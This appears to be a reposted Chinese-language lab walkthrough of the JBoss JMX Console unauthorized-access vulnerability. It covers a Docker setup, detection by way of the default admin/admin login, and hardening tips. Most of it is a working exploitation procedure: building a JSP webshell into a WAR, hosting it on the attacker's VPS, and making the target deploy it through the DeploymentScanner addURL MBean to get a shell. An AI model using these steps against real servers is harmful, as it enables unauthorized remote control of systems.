環(huán)境搭建
docker搭建操作指南
docker search testjboss
docker pull testjboss/jboss
docker run -p 8085:8080 -d testjboss/jboss
docker ps
#查看是否搭建成功
進(jìn)行訪問(wèn),出現(xiàn)以下界面即可搭建成功
漏洞簡(jiǎn)介
Jboss的webUI界面 http://ip:port/jmx-console 未授權(quán)訪問(wèn)(或默認(rèn)密碼 admin/admin ),可導(dǎo)致JBoss的部署管理的信息泄露,攻擊者也可以直接上傳木馬獲取 webshell
漏洞發(fā)現(xiàn)
訪問(wèn)
http://xx.xx.xx.xx/jmx-console/
如果可以直接訪問(wèn)或者通過(guò)默認(rèn)賬號(hào)密碼登錄則存在對(duì)應(yīng)漏洞
漏洞利用
遠(yuǎn)程部署war包
找到 jboss.deployment 選項(xiàng) (jboss自帶的部署功能)中的 flavor=URL,type=DeploymentScanner點(diǎn)進(jìn)去(通過(guò) url 的方式遠(yuǎn)程部署)
也可以直接輸入以下URL進(jìn)入:
http://ip:port/jmx-console/HtmlAdaptor?
action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL
進(jìn)入頁(yè)面后找到 void addURL()
在自己的vps上面部署遠(yuǎn)程的war木馬,讓目標(biāo)機(jī)器請(qǐng)求我們的木馬文件
jar -cvf shell.war jsp木馬文件
python3 -m http.server
#python 開(kāi)啟http服務(wù)
在瀏覽器訪問(wèn)地址,獲得war包路徑。
然后點(diǎn)擊 Invoke 部署
點(diǎn)擊 Back to Agent View ,找到 jboss.web.deployment,查看是否上傳成功
文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-539947.html
GET SHELL
訪問(wèn)地址:http://ip:port/cmd/cmd.jsp , 輸入木馬的訪問(wèn)密碼即可拿到服務(wù)器權(quán)限文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-539947.html
防護(hù)建議
對(duì)jmx-console和web-console界面訪問(wèn)增加強(qiáng)認(rèn)證。
關(guān)閉jmx-console和web-console,提高安全性。
到了這里,關(guān)于Jboss歷史漏洞利用 - JMX Console 未授權(quán)訪問(wèn)漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!